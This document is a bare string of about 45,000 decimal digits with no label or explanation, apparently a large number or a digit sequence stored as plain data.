282782126071247027859345777408695302938393489591886624997274078706981160044664113106422741654866924241225331732549188933060561729391216337324526925042956432817670820174703367042100778642505716695789064621612550417330977199919835638182610858303474755892423813020952691075378357799790547373350477837782391044222796188588919273894389894644292364688754818415711028777751885650436457271453769198632616700785056948982857619374026959934590839610454738561122310364004896038532823361400106579281441168920359018327124748339289058823021576998286384091960875777135271640608408162541449751722329190227080305686904585320660368626821121955053905817580966907374283957335213666067514900885838366353163822880282264100479857507403094122122075519596911013170930249887734355364170366413013700706156201020652227249978685602815783890485982969631766520978652013479031904982426604245107680822076466250208696850021958577731746906258643172034427795117684459671090171020147626277865472462700615131609255668296494524348252490965216419954860490798666388439225695822867355039811117555182384064593549716104378771345481314194220893823431907014644453231667330768180252077493370359895325747803746182873476607060774742680113729620972471328494875822653579076164206169278069574835285567258340304012575537328527308628854199318033154124685730390488571030979702509758418229195565881849561075541217911799706938764200921364267708971652768658218275200605671239293354669183225867984421836476815747613473030617055202605778129116442596259048910168924150262769458896291510939625538595527212850178766412260227520421388300180126085081852007243510980984659548430766879365607001797543663934622561579980031004383631398742499033232337784972827241758703148795879091247640146289126383914095787790966969638409118080852008714026465060445051715456706751327940738636387375477674040504608455027672193620638221463848099223977660950388463192542652094803974562841052044426569971275531499571518843369996370968906649988235942607045563216219733810153393604532176931392226481561031823286152610673311850113990463354085633979977382282431163144540405252815281380673824187513928860166554003901427589939699658865217797540276113278203722663709885419647329728093019428052032873179675563045219883106369380366451555362671494994660146963884015757615317112664597497937314006397200317543989692508973608935414809781360907897215220626697390801941890221940694839109735153491174336085022647485435047700995399873855574291071778259244586513667611945786559666897562540210876005997887209017965737668049390662553941501604024616179826211777102425028155359007529548448941111617753829265736781441238185452830234352688041290496379880561244173408335582927106342301559262152691105392169851568783059951914371879187207416266920703787098423265773341415482078142480520155119652489872718447958031904564743331605220080920541222589282564545807792412854113705334938229586302681884105862750497329024582031398171710072281942029482676811620940819299035369930742916113528488515821384576978388926969308643296423220679414676203640012914870719076151993160215086973344997604232532469726454440232302151069001995169630367744389757024120708649068278706693558239041210205844636033612826214620940438543836191631414622041105770323991654726725533177228664860615431580599670489151408268385069021794346072014917128773001876409302073665021284178286332796154506774252833512693464835464934528938462461289901178533832684436460788378967546252406985121067469435549634902562011969198763644712724831977742883336706966970740485620325236084768325650628847647633648840990626125537961252641119833386269120539139923638533531111530298967560624708999545618247632649612151004936895056211199708504976899124527083870588366423108294727326385114530634409213251816142572809409810945012430396828486747800260657262656825453949486231169277742276188076836362111919499633086573565327983854223071827019699872643628805119119420989334030674365554279194064571205454246067666098891343349589155872171496898013340549399308685264316852153187293659178868940671573378829353431704468354773113992616555101767193005151487145139575265198002797212105187909729149702573160558626515249226023387313420147225128403403285703775433572919984866480981360768963290354074437200800583973565277121318947713627989331795525366279003091191202570856648951740913148743356486910848267294876754972905265270172279314040244539268676729749003377948669964746670511194708998455542691232048367205427498587116171446246115435810423703181828392095461367108753630209762659487006404290283337782635146000860027579489141864872691887362897389778700253540031638439317964813230110554723159335907581861966812804031741857345896939887314148163740990356193871739751898826081947729707884429652131548504208106193034276831282683437456318710036121947413314774681738336477666688557793719667261732616963941541217860928772625317123850539893122932074989059212997462414944056937941077529863050170092272054915049062622418993591705395716208247156263275388382139147073685870612899617438572757876097377104359032773767567254909997832157755228689575941310200446707199257183661976679616959112079677712122781993708521335641367393542468982018862544514899217783957574697226844524881839123255201021195891440171732031047306515898580184947282469494368038664828444783855315295944460021707806524237033438040681766267905429737347002323213518132076794263635459936327471045680119125511285585423086372373239511078665973302184166710378291250591969563061470252204351839827741206869095602726103510796091511355446764877079532677942798069112217783627559360416907385790122602431144856396175767986466996073148038368017762493403128936761830235949616706909299187325269785646547938570917263673977931920790474970613599220332876822988559518927678118347017012027753352839290449032057065315679439495795470502838255531962883627259433550484494253553336332711187777787513604988221143521886859109405835393220976325279859340550675809221176470588486441073921059228917146775798823173467243132076679837656204805914806562743648683583552169961728310571435954163963026131327318171642635880691572572469876069029002685723533689457450564694274316925528575565128888055068713226696693038754542929743954350515913961102528785160927960813175570668389609768163563786534664960320212466506432336996225385650853572411952288218341404168999821577810759816470149989549435841076160354488935651319919815647194083326591976146821807844897322248804563212145889256568922721589851646032743230353932756622128252646464108703820285989252898523082234059447393498737774832317435412426657216256720548108010107054204732024729428259424414299157873452570759059653444452070411929717405838908340190228850357032394120689514997657792524683996813938025661419190447872723954701836366587666072889539928120317768194576180816246916732216957883233691544028874780862651245896002090310869602504359645715281632732386175302230334804281305304060902995042473143406130425087121591674198619575338175429435708438354480991275169647029405592179206913668581991136826163021149934761993684300795350222322342937894221240264928643401617317354747923166964868625056736002770811402405154959417152087846813475275577122695884660681124553298190234660859749630210737118348785057505569334010911222783786264896988403126146296041283602473594452835541353681609208096684009112100409274026436419584328743764066632096834549370535226921117888084112123801233717709443314710572327785334784446827522096977618986390013414402504800545973571434980109360465351343699536054584115181902592518094170293248965104573300165622768501721041275138230621045016352831227580271206899101846538247300460869328159841080881086254924454093545908147544486245141230842985596535550934755142420963958373201131852939229648414565204089388858732342941581407833188729455583376544200542441123061804632574822020557467097371887936005131833538322884838151296715390065135151301152535911161104742871507224098721089799971631578268338046586731190557694780613463397342403348935715936478734207907016811709133167413466762509908000350071888538348887181309242199502850288779568911390308188036830445948252928957105764911317367620672929872632731267847381852040874981294280878994087762398665887786608842196979449480834484046051363350237839609010132852886625502258384260635134104734303476509276896204388268350716615615139555743763193114820302508509863359941286641123432473212631549529951998174857931992218601617002266885771874064696294203051232873891009732539897205471720466343542719205577990435612878568454981248396970700972176994899940583263645963020723009775794861512597586471996692687227149461812714848265343860524903279306492891368959777196664371760140648490257134284989224723560376387541878178063907542501947045423683628578156453224774964267773034661888918211945882005756686918982547024500919248582255124963477850612820065357265041483118485464679361607684114827150637830265701785222125674556403381554115220443236443959906328883034126693953105008406659445881550509227138076021257912553524513195077367313554733847871292071891936064682028504938392302881776339222802649610647985539457332716581454453452287082531730371738428790570318261512915615010588704523297298522404232712118933476350320440553552299221986085338326011396227705096215127919761863863856329892740223401366075047158976552572276076261145795199376982751253601080960860441099345849438516323645905338419078721606117449611497092153002786592432734686187724000244758909143679170449913346625660605177150878880615519917618634757336483914558921250748924331395817788520913045274629044162885680826542428295960528171895743893567639056049115717145681432240865683045349160127424031029771913725340788781344743497419039198024107650066195767052805039983688979314579797300956169952180576767301204721630591729653493244215418766809644360601766934606666721567208123407690787440604328828945785117691544948921729481402624970029416255527648733991549342232687344350421084522695211089042243356809159941272446796099911078537883182820879269990927472468442383292831096480300844788086914962468385655451029459041304171412658161010807989301384710967770902431986185595741297766484037597433385583843695924495291399565870251272138757687772110674934334567111335749600985456854016273867080742603923302144384489406469387134149931002127039965804347047195803554886762222649433385395397028093344806170414838021113293891241749642031880950712035186772109503763390185637121761048428441612917507653291753731636751261223541175410411439957885500252874430747675267235347070625427179407513155846965932687206688335871283835489199812460705501873378460524031455739512549455021097061629973272150634631314226953461342358575705915426675699441176745166243155759731373777829622176665986694964767789463904971279346642624082837090736575392431217765017701774198089169607790132461822793002775481728074378224215667157245161057275987494149029705794176537895182417848778768595977911094872743433048823759126016582215389061300098231469820624362037205175702889385506603203126250680417131578539889544542858122469354710178302897216855233162086237931966017961421229295199569624940272701507325041842544487721606367007229724823723190724234840013905433533094810667556425175103254240436892603962157017849263016723190754278601116361783494739380622724790397167301468599973137508603194923201429313040031230509131209227560103961015380064937095930264314342793141281340829779285302940436119203986208602182598833477993871620107807603614459457755340978616865762186084566076210427312347029935990307149153328698693418191039649823419864224007191481533996281887520523688410334782917116507338418731062527030908341415256622355956491911883098134418120444595492416461031035430520041037382016587560999994977170563394666598440577716546794417822879259044178211644913147357402538328870166914569968546055720124462268073107390816314378588652965188512095468783937168492933395613401958511758143152256782504011734260147866295662149240362483390622473006096263597022491829284086764442296123616768036771070420118254827883803086548636076017118660406873043641124769517668304810958690753282405051862321633259337006185410536820662554415620269798531643564236934399220992985304056123743177818211767857860760991421332113143881271952106487125582481934936872065663672456976568017751419509838078976556309340025959674704534737849763764840139401449042295445740218145008749069809181061519862167338183460081916765762961019129891456499536536009929142847984765175862703801419363167577419029709292994754987332493596736546625919303763121007221060828295839131149029664960470486980816807232261765744766082053739193128204136502640248845444440453623516804585143090666221641281469922390931150165970127060725202607439022350153236519578520660543579012694193994956631593936558791941104093344231166301229167797293104190881741501501886464371347203280015109391192060307146646138282988181787952086664427537912439042024788025621051381235031667481531422839032874905654983819571446056044085047742419379652510574998199493994784074107832439136514184714314211922036432484649599630062066802509534163041115158637166975760216513893877919804838776087241218334662874315337008668671750241587315985393010731792328153167481180089262370766523852949620520396214973897294481356438697433234708731584864986655125117050121844313735542558670264990289744229207439042860727999273429430806597575605824833456138378563311028676930612851339857959963025603575688651379774669226714491854898570153343165639311442933257590898859208406408277872598685345563946683344671963077016625867222669875705386871312910568218521479569879160145889308107977278592978421178982385053160696299978855523333312941380344594956995620388207735151614690828707332993794862495941032612324050694823873131118758742793513209004576062845524661156637809735891832588723513042422243500538156805579795903836285583891932114384384416718315986533819409689668932428106427275416138892909381785289274342479388954938337923006636378211809431722027462470364553392995599811333078772886876873571875347820195848751413903860569349647927302401804657387023823890041951726803074997750062871360303701404015369922461571993923159216400494438015494355250018271791322830275581246409040918698079746841610472481048717938690701301412193368527518073154951858505536916947834759001690707677612398595584625470277532558314040120679447721788134076111247990822277445331740562474136043240227508064858375293394192221751805306888502514770438842048142078103839430027106408426329677413981171199889788302759764564596645968535603290980068527674670689161989703859371462497493779925435607465321165643878442487924408121558501059430585381054973448825292039177791447568955260268896163811522248344164657942595959919816212385534941889016613010834411893852569332809353173304615708738062164537144345137618856142613055934376509041535683608003835025170364219802252139230721818984725522540837332551270937721448724811121110932933114578498732401780960767018710742774583240245616093950982574890301176777506217934205020042024704204796304726947163539063111561805458203445718143077267980321617740075076051832033929516623111577658761646607853474239445808445336750312856994984215160878085196370940282615685526250709367223950761613186797310255577411809199453541302163573696301307012192682962052879434228700074970008643044187857191846838069163718505093741278469315560509416158153509949880058050753241583448760750536743792834618138292231047815274615572460074142295864505061832053061059756777402878458695307939275188680798475297789187097726075998849369789269002324054521609218509600637810970671386078007353838893024502367226345612790051643949018690385048807856267282922715210798875783881783182097205273270937657692057009933861633105197845145676205361199500195304891945407260725094534494547581136235314802925107601435181352991357066840023863813785479175940597814205223874843712601755764835166723036813986722425528450505032012527020478327620959887697283059462010247574715844433570858244721984002964563438969128510495061889527216757024684484440377783143776412340270903086525530507998851667329959475069991082833423956536573040042205740973385747271532705986889425628934998115080347347159002074691153850100686793146044778847161251373160646852234976734393664055543259564195467362667345144457602298424547368038133315104419839392959035775388005702847908246068132234228900465231661682490967083194841423976252327929915358846968831907287146636588762198726733102514002491125154126067397228831876566265652330037654520556972436728514664026273914525365357335313027345791916540636020818598453279954925118754533013644338563031459802064748993861017502333343768745778688581136537800948820753350213862682297222491568436915820569386246842531395607002560016254508506131573124114786694031947637456480794635979432658588745614660670445152999267413409459785790853199043262766036557654459757680115350291348650720231800494645917464154525861288088025788751349056064136247860224275779435124970744313622314897145536959077104059183055084530595101036420617356561066332688204060186310947479391868378260313029740556882059013427387524239288492075362479083084309598272322757736285511576782484489467973742310929573260754640326409426307401667587814573456216402305020667077761927029071780878572225711180593143453217879698206751206385571349582624753239306088711191508292610538830917439092228044068248367720766497113214630529753748025019665589346015884639598805649939245898558607249694178108648414854584369468329852947452502396246930208021342722977461810754534366213639263658610704716292846731069796708685194300962540968964192843524638576729059896813481149022516854120267065346776400517755205953208624771241712033951587822097473166493438317348786692491941413475582483923868278360402143623620099833543562472994633595363552315536647311385474719694322008757305242581272673656520252786111413268375979280608571819901670150935717178719844648461546050327655060678343587369490262925482974237556723238406350509309708143636684248868852468216989209114602395568521992102829506394425551513311065183303558048241228340081664753087366523174087686344737401213983851736541771221385045632880355270836535966615740480216034283391925391608370534776043287925401346918964093157782269035198619375861082068556923226800978325627716166291222952772520624059098179337584343162396441744550975546627891574045128110650723882421987095379355507472344977861533266594102734672102473301364541414925122510382300973511645090526334691207441531980481779637813879909312899562611774606668199734142837140415054966631140132737007379860893170321535174176590111231668616235448644803058930408789581405004618894719246353012584650588047532925842119400876333486087170836427368635118554161805192490945149070786336641406928631980897609057697386754340117852480306112117743042943840619907576717613597519663807186832060309204515656727731023185975726331154199983048349615204699028318200586181708675064567419072605859110278650636020864430651778656825351030096718028746347824256723931714269749018726382405214459793910990164466582800648412672353067952939329931319198651256577426172021785210215770461226919884094223116046328127228369929626919893892957896576063427766028735498166539201602671202148420726083967479333091374421150647989112314066787152768934701373979175948177650569322689040596274186147807680264460156852211235301563626852443537981377962995829328985155021491234677323492819432180776428225592180970925841428924519514850844827046622861642831411533040719130963789380502683677950867318348137484046319970788668404819563990300997562660339375327748389755702250183124884573024177360527118791115123936457576967720049273154886383225185297601685131009263100653123108248790249674911278461553719531350538230514145625164013184444618206291835873604892744582357703196518371109470517665082050648364006704729823647071199565771952193835770107886605497363201193281891153319137900846896907313291386165426108812384548189261334193181400282424167514210096823008655373155528943329051817797653006575062062623166180906691356286452337282077935254153886638705387540111203474175568020802845744646625868408417456581056350101231292117033289917107773942032141505078747696317119013406051118705736070805297976161545439459086925245129500924032344042838054009914037333782946390032630690460422567415570534565519433784444471262397989447498925241747717586949440623978391477337564382446095692126197200241322020158927189301674681012865249426272787239072892778229965200389395337846953314340850758717278071840430842026372042022983071682317456260872444609020096862848006891604441544854591933866277266416509177776809190917635973423356295654347761589520432591317569220215095052719541731914411282672717197388605409021295600983123740347445421056668392388663120742401863227186491181730177604072582814358134119653505704874705265158423101422493727709676516873941898359106843742656631099363129751243887939536335748987334804334383065461023489903480176516010015404098569797744727512142294568430820160068953490372389858990044618879988006623452529759376518543237950478520615737653678913116847016392808265523850896169337931428135052765547066264753085660744713792165038264622449748433085021568077110554534521605903912879090364718919877564837300417614786898430275605288770721235012221860671369461057979890302518408295076881454962849489801599373376778580791175642249836814407495353873031769013408352449900404030626859561692019985185204661354727021796104543758837483673415120223995916935694586473443919090683314698391726956311023324860529149443830666663052975778674654056117025113342877501087351396891457349559941922425660411814445342066287839211771626722946236801173972198073004647697671376554003142021692188848519637371264615172278843614753551461625729655151817197269482576958448699050413508417851119806829537220586095504913350214292098084342666862142752698132285117082990626211182553242750034417125661808368450953715196065529829032524255775453527563438701764883762716979847461850713351281267689871902746357794314455875021700464525315814762349891348974086541194640341375992620392542161886272425967305936231802059366911566177347400281768710954832448720366437983498073894058647769156453951558143906702955321654561217174411793912916387187332075458829418881639261904740817890245684265285923891165083778361955424969689898002940115802960470637840572596722756090614924734587455554832281793289655778860971738448225001351650534883454667033338817508960937737677769858378122288148698878250205753780288746118707610491421522120746053088834291417780464535453382953278455984732871094765816475337428258474706204906600549317351089003278936936050353072931249294030176416596077222494916362560909572733098780643904365907373864830231912232874024958843721767415960497621815762677105940527388722055538847494799137890822879499282785068900899248062843842261041176376871623728549126115422679829823637787231917867698902478256545796314943530572440516111353991485478623603239861395867222096345151793180607005866835210846941874586764013943194741722951945485909353501178888858446681886852685186084979296252246065722373237767059951128587827612340466216094485485449005327471379437236445877730463628643434263364144307707702393587549263597080450436959592702355403222294797809571152688450529200690584521972636960449143577749392044392910751876667026646800188754780044331937574435826158062877352753274470163837553844569476335759053736836972884012041426189600558473612761933265180293534435634248064671539517962467229974030611517569754261552548917142994616054702495213389252213159384114127712933034654281530603204832756108257783573152363553146307503131929700552035822930348790203383317255572555108203359190911163221575479254583068275985046896099996086002388464757419787653529819344377934787159251880926533276558491105894690375973116658848011812879273584217720286555180092104494760120117434583987229242955702923291467640406266704789269844153346187676714941334533759889991588795322928446805699614657447824246717953505666335332258870787214337421319581698778327040695285088265560316424861850543011247905534003139044502460693835204747099373820011821517819656918117001214083835991430531981401872011857545626087574745377455643988743713572996223998977043035871874278177959055478491350739843226490169306306793892816417882319274355011473653946670828395342028868947610948030299823158572058158230900762682426098689529954178159704833424324238471523435922532746069571019332939051695506293455184784102116306176398509629408110567192972350798636711290363500722099240541185276792165356014654971434522057874916969514667175343948036037432857616799509733938970496874338763216586938187296420819297437074891825461212587056352685507255203997852844981371095843762793266275561412892908746687616991377942115193624280479213513026776961839968351565866704089795457728053471253352357457320443355945151326064611416572129777936723496326629782754730765730935723740167349299709093765358412067677419372511482913289064804539332157775989447353353924985664727752015758848571933687031603889591998370210735548590587410278552484051955545286291600885852689533474893359433039192913679227220153773983488642611927315477481448933194384355889895567974310992634007663959232552108698673255345482301303007341877575757487786569876115400640313991997858423813073391600381702947499301065805433651557472168412204837596793838186307194444343606014400111985859187879280594943966110842153341312878964215865888834740186178270718231161140887214564858499391768309697433351500483818348467203216511786664401395084866912559512242172263033020740926324651180887644561151651623221455828700068935529348625311133869960914861373698163951255187292757899575620903255601823531796216949923367066028836999769959468726229283446607859836548069765939203153897277031077026109219586223017543004224304494408740258304430424046265157098320735519162134530260315479613280890312179431502828262610011937192058570576655399087067680584045920770036292682073399194098903649175411562684695550624643563624732802955114573956355128420085713908435281056560205029788680509841578682108958355882774291857787744720750792132922691028264190557525529315396587584395951224097594856704460964551893523916805641479018523144568577665924663222388026156402304822387753080319903492789265935657405170020121854360925241801728362504698622180670745190391649102419936590355122314594861838325036058059260258179225970796218804910046975538352678674229997422062739216734857676062857475770540054079315811194169253768921341623244394070886447667421877676592938968630942256527618493964955950609580925672354732403811236935657490895391291906023911261815677759696077398532681427490139434568265497837007749049059050539516034566780533511189782534806608571735704849556263221068098195021840051575547011770506715713249482019922689783337666820391644168941615559690916969900504710371401771812456477652390089635468588227323724793642037309147460899952977203334015259520133567212957777592381422718802485611244701524926558833749428180454469533829019486133615529991460574354342055764012060243205707800490852029010967709658970595169087447529846640363526084123344646036091416782659853769323575470114514142921689762831139876941383895127996933230964533434148412346129612495800156428193364055019130931979850688118740612238390337388810004994206129023090389479421380264466600149356943780435035311768650958233334311059204941384538211870963950307600869108078238660445897944503587251263608529021358562465222361866004227445458827053978735655774337813018724890775412833556678867426986409811866291332854067596439764656128902036537927780220100732157509161774680153583804514013532746743572260434165326347695865354190976838861795290999062362338849472012820297879952859865153265273380319233805613271801149132452583326744806487974948790550606785027526020670815359099759711335998446128785796563972179148205229203586332905730206585871625981863797708058568254966884715310188525399733745643424670103648818135943494516415432726485906312605748793069313529300051721690279030242390270605216341704108103076489062751380059727075542055361843168236337029005542542889408631868626210498758590521251755997749971762910051164007207678932778914346433049822228355756080698369181670701319905070877836980342354608470099801654328849532000026309245628918437045554396172499124224895062022449213310630945378176458438288764310441562598278416869152804026085273395148718578465456796326220861831401821540628368255540990136916689785468578921093515829467971324852694141726087339045056987854888846009780050393822969646628515417883196793411713873069371827719748802347795625117793207480647867382791321601991391073805673269068997281989933593208088267954250650000769851994312608787558825076476371877482274067507382387372275207749091345413400055814528771098143629079079838061775445681712138412543789648161680019848269861177361812028311664183282240650641770785821095968201702729038884569600762028683768891323772846096551736122569395935456747962170852896608360317041974665771785478730566173055504558639315187395907954207929540738669794867305565693207095916771534452962180680707007430083153253411356911448595133836250376164093552999000486999432429236108427206797150264616364839452841950453232525224728510169017835552166995775562306285775421880463840699657444139246795077381756669247297208825337880737123566318923545074038597529051532524807590253568293233654179238172902149554017035324696258662697128548288660458867563535015642913455811341699573343288966117672737786896801745862639913324926230376473453354010286089309276520586016123684490627548808449974962373213100744508066350795152287443312034187812965754181471084181327942798781198723483440022345924402822048706431942252567615727641935781163688932940947865098960900808220150392614031975722113956637137487903795023915017959871777066880675198366959715017746803838760452753191745738702085140098183676352194100085730227093422886489621299824815758590341866246055351948150767688426425830332368905858908105698180054000829170227660998582462215894567819471332747422942382785375112177463397489221351744138600251614900090266045477661529529850560549506025032079518900028065466636122541832765193594399010353578733799093646507435027452290635853641817430222951344312405424376893797225392644825611316588011523525729908837730784923556541812685866786605583096412223225433550858695842127110051108801860196626570178902506061713302138872369751532740508039972800863131062582683552257343707467186635526061126870123780692839823416674774926660393138533084355166772537821628382364012578941908177955678674114273138341470795916758982355313116520219068253097197071459887963573232489018297505705993529060997199416015083046119036539124527862138484931460099522738303648601051918402577001549539419908655759831633727738000060833671187265921453091445652904619910118396642517756026614015699845024201555788806456201116157067837066319279403513689686154364293686251363659378931436960436741368681916655649936395485852735312549630301508978573114539174972885394970561895188687255853002440321506243031187335561019398681076904262224437819657983418991922387814607251358229576910893254671452932392382977448155353904597789628049009805514378559672709623289670363851061297612319501015248206417255763084245426933322638569964512064836992278883126786832651976097782566822998939406089161408694122365662516610836840863548745984364593553969371858872507886497402688391804589654649163769752615014953114631060891688436036417252832036872055454561444963960099753606825267525568752048483944975797159602378631888530717075880824722222526263865719027445270573670778600887946835861986053616055567862957781416995098087947425247149689685047120955353512053716118341973442880227045618411039207935810365392877163712527146421094566146270332203290069893768114103330316177529795088966516504079306653660298785941143714548563067855857675044313563522228948034213550469984038624244720316638467491126564150752508618627324485325702304661152406421425271789187276478694823405712815248477358757155881455704872190506847168996370159660115470289543194087060493473629956500583713468560063534569334154836030529261195318761148573723689177823918531955610648787277878590758329104471256649582409249112612656988056548342006100809304364155532021167816333426312909453890333347659208447533580606992069246732833205615567173031579826101995131523129709097250145559591158743432847139057278504115575119735630704360409520265838049980112186091292431516640066029990332518166946885215748597013650159692844878057705539325017336499201837535585397391199675872727373003815605138304631202258345143595414726779361795359259975990364250088020715880943095388227842358783610793428966215631071695795359171428726972236630575431195917403220162249503166359789520123216866989596617012348270173617636180077390439129362020700770267396962896292624123115341236170390273471135640153720844161351482340364785178967733813034897179846693288548952952738544130408194283813299916761999942707956065799531079547323027914872465462628466434666592660760822623360410051915171745648055717282005430777745694732462342968867488657258802128838825225894643826225585519731064355949353628077050700586301546427944461046302252345282707563148914546182691447577716898163729862346016578315333397126646990517006456634439253034440515621816320777952333326715609136991685917019946864396241450533974497657604303797487112386077049529853427715566036715065405238359071041737579589410073533236628571956360760164818623065653446257506810084846617422226657642183928824060179164193667115504910326957074743866038159285045315643150486135779175198048242807904010233413066968823237273827183904675720290208887659142300795240638159427733800817565709654345742892800005888980807896255620184809840797499467492479988634480128500504730392378656318880148916716117451411134386761123358765100323228621643092485164082179023533752022422559854889201496272375971035146704993626121560681628648078555377235485965273313903899933439141095082573621741429225185948661059989505092588116320842549172223790322799305311915283703601156541095420796282451520983516538163020083463086173100827103487162844494433894453639352705328013390603882510666865416377277837396052657356300596476599047739338754414840166598812545900520776638901682484404856657135531941574096269136187941913927181067144689114736561034052611328652351835552683622036961246101027062506940207401566952146160423720659901466108657844384070936766789757288185525812076229679350747193314528302105806104543886296715752339409210982050413873359262234826675302777149389925505530455856708787631616294951533790911450156507569925797315310928375610582076006355438367228556215542895035460589695172276857551760644210188365013279358246024491991221161484608597254009927403112006301060592450517863954618501832476334326613120027682095445510246764649545290206076947272192369395904364488562671427350002571096456939232542015254719152227821392215939745223085535709992932745175925889253808220573106997544812539597021152920944978921209253947918639593232120077232124087669415140397700744736157592465469153065546791371347076633827940075636974471862415381315766259148357157601967028408224716043146405935628305967338407341352123348692672381186287589554313828986085942979068127838641038231957369768239624592530904330306665161916763331784537693246626722285939121851852665591695034225498771239615481675281177876464121910044764879768961311038367328222179756780672810120136223898878002510906874539150888369400133464218480537758150813885540954555176304951877664771769543623661197934506649948515723353123325386998460037612496685407868375325480037048479243300426627523882097920119055239129622420287548804187632381657841426256313946386365437899282960242160147312882298933370803883495055809449409821595444573375095513213687848541019339559615815565524975242645483758269097114626169993112007152160999936474331014408816208429823482135328625516824949055283122389148539613589745074914245687033624239161121703969477051425277050913203710955240375861035610152123938711932610614800904553261250950977560162640531842251971436917139731764974838462412766246003141652402230497514883422521576242463213575857444065803784743482318303904622989196783354147508950298272276625693391896133754584064035798710142699546717758047824618988211004702780603673735855016255140658810256539546964236705503278867255449281755525919728606141328520795367503415138759597623754789632442560682939218234408369030026983260246570975840708285660407005017246874884836790109777118597493689886866807733533139979845699041796857858652003434954053186524693621204548773485463918833130250397849270737131886536146461067178572684582616804934463347870531611203270141844462971443417226261823915514497176583631184990803024621771377915735531859473405957945814481025338942545375268653787715805463665673677168073048204828983698271058395113775232509722111879550726021394480199512495456871939041695495224719765338229516158798758496012568961245779109251830310175069967052692717577777194001037034072262866191759693229598132627628313661030736087002065954072266587500222758206268737601685972401094989756857667116892183786324025315041900224038236189134033741379972179291217080663049339751682767277788317017792973547802074201740584655750380429552514526598030951230765689250492479039645891056208312723971294793566018216307337234278775024709719284116657393813804406835490565403807860782836297578549136202058160420562578575432528327971828356916943761607359618045650321140300592350912243609206912698613224786491135352984957500760087167563786128701994063240877240602292489941170492991631498482716677254158148054940055406029942778813378347868744294138460553520628899841799764284132534348920173921292490061291280727991802865680965721827600546302984158793945481535388109974840736543759826442705381909619441211307812838553679466967028698517800137832040582245926891109134689828684027498729676828833434387436093073824606625400894639636684133748352784270806186682529392656841583673365060557169367895490641609490972368961582286749342153100004207038305276859475292584573653271148575651415807328126527563667159182323310030755902718476132659357979880815598024889387631166765665340642785059386725920127957668398644703439618496617904563539605684613941491173021929806595309919218109083677056176367302797797820459611922853660994516548696809583822572012445349463569913646408601356609119637331119303763544838584051355769840088828800363799836684308920508069799138326306251446887471771436551857728182324304296831134735470435029087459969194640751861564628013090341059322246636005337956918425437201731429622408302780101658806197944481918132946549185356247399177017163639445595671160831482670893803086298908712476114283357065940979661510357710933132409009728157412077262242228559491563538878420200541767235564160843831152318870825666169651786948798714071954371352850417617304457896148623918089130318374555510749192357172489590808456845751700628054002355481280551790183229720546627275370288977850493694729702601238609215971913441785914440456624611185870611187235587985893922811799889771029516457160881761628430323557907256884361821727327266778328783625654106572146113004791532061557904601934476103921672611506173948972285676170954207429292203931003412260832145249355123068305865996149908030493023466222819455673413724387087791601242275303439450862402343799395812985329297369780034854291829850861818735560337082652881497596205610638710658361776790539020736628451897701662782184364349945371583796859822556330756382942953078799539934324236840747267887409211038268344564541245218144927418042835204043236658573034285084293268924943219647640827292864989389948344885230345253020779861286020636187183953640964448588550217194189209097904918039716390130792133811896587815143641340494627128658172285837195766133441828748957653787858220628923609189653669516439163847380066222867696194417938427191949308576080891497757861043204836578650001267493504734105116051120065812300149440595261482038109287449102356089321538264500168426903144343940910282040008675452924703319402962138340812803107122160557544995412549712349939596492189948769596413328649468577682419367037787846705841717012387933284069553549588615988360298961900313897033133801307861232062145205793314711029741606168480268739416716155991057733599752272273027656181837831819474475009539896351117954177903270040481736929874172239047438246448927598416955840186114705055888318731406727372977864867634756680472018596930552922969853778465066081495530998899927709827959361171140860014439408753089082610569629174892114180073467094389944763815487685829830377265417528868469370696417294613205072350426268280303068261694226421014483323539925242542402070099532393361777261970774175582670444317320254860672187732497786337120054370402956125376714935986861002668398022918366585419714781843371926317495302849775216170806425073650023610064668121875880303228317879267026002801094634633093500967993833719059294530565228471168122298282973089485044656681609256659636954880108767552175374247644341174458045984900336562854502656693565642420164713650477912050046750721406566548068933112624377456318394698200460092089920324075076323263630100460825936544922413021806279891460116769401780211747897570106647535780131990262255789352367548189422676792934711461464999406205500524033663917478467760962129098803837962773132253077440884039511670181306825003622667567686832606992161456941598588680102980271014021812594164240545699250002343989284663435748015558276189311872016274847686101250258040500733553244604386595393670329743119966541948080912292749457083459404899600591636541971024921610025541213879922438454350554349424278629079813665859463174115374317766783122900131844532457509474649762532632096272646745792180839165393013946616405026467022805256697643650449095349039117057954327541578512900963196164250217813993056983907441325343733167198293372109457462772491955666558755790439978092992423572820720672062642590252199854562312462391205350990865771347631599766324591565583907519924867767750229141850140112667683079477424382579589542453338848487748584800537764178218142590063625450546862475563593256529817781702976970785964907153211830629414686439570184627654589596824786702045789421118416435760849622628305884850927986891797690183195789773847605379617469787293162909992896258032475650685980044245809059191736785761221658549656207076231632890650010823944726209547332440150109408826096616414559391819592201197327778614995756458860244849517659567617150273812230069408263095529878703539715621858615674063641935891940673761649599755982443577881510069778048807679183044315581789757671272279246768262173159273750809278386555095899504992574428986442230968443816171578364184912444661531998734193716667728528164683139916182247784556443949067882417099462232973048314190799099100041507903620152609549837264925683590683544799955877393173601050089284281965246352211376198512613866664338798210120767300325868788597507332342391624800483880748070903841656536889590950366422226088485828433580937348856592078411697562269533018252683651061728933574902621996889461672933624389244370378766974798407852775126731967966102091413674882514869079716440988707792664437989510283253261915972625129356434110222258398226848185418181960449392661178079768963166456781538375302863911052914439795996129758496276018432242416889057450902473901419155243971900893702933368213307481852105132122563544720814445961116184696553342791471575710099419197048974417364392050484166690828573414746030651282531537676905083088296248068438672664605738377967607547093842331368193749456120925458951931200303103870406660137454900849118326444578421070871694197211955833499824674933548263268281160921212374666694237775492661896066551989465833337376351575631177255786594729161156489016429762374145748851327458587756145378517841770028357139422418577616916723167807492139386235546987120536544987943315649322772428098806860749909393762557921537825063695166542501450133695131487779583963463020322587107001800161208455339131250731702315176548974324421522402421260280701468384839305621350592455104921947722638477282754117785604835218026325611160028401112503825609871241948014226416636304861811290484784934594565164104836326522484321154634947081074150787000439724428995131129500746987480235300076311360577784998583943760344781257447307973138963414504416599195080470581761925387208307574121134146507341818016949932304932310021744910161729517043575527100214835391260076498564916921171650580719277976291705153448999487936035007272999646371157727927105122724193801825219925848651648359395380071983350895252069298295946681828992967081026678529682699940418100874985183711518444997566336653270354767767048049657293405551880408086279526300313067814772645045747389536321783009875672247337071003753744031439363098218565352236078863316052778381026460567752222540424439171496258281606949172409035868954593832761746783770004165384146574781727529678650004359615781102026313411830265281106280901224258685870133368779041373669590072838277111821690565449524950479536498267821766503827950317609790102831585448088302907401042874160860963075465054366991870154737259068937067306516336505176985907190419113049308259683908791161142967133880829291801317597891191849393320838676312681505345454129911306371133778646501660797987554935216986726264296580785092756126308369410213931788011502886720613959598821748681854875049151980104832442085226658753806559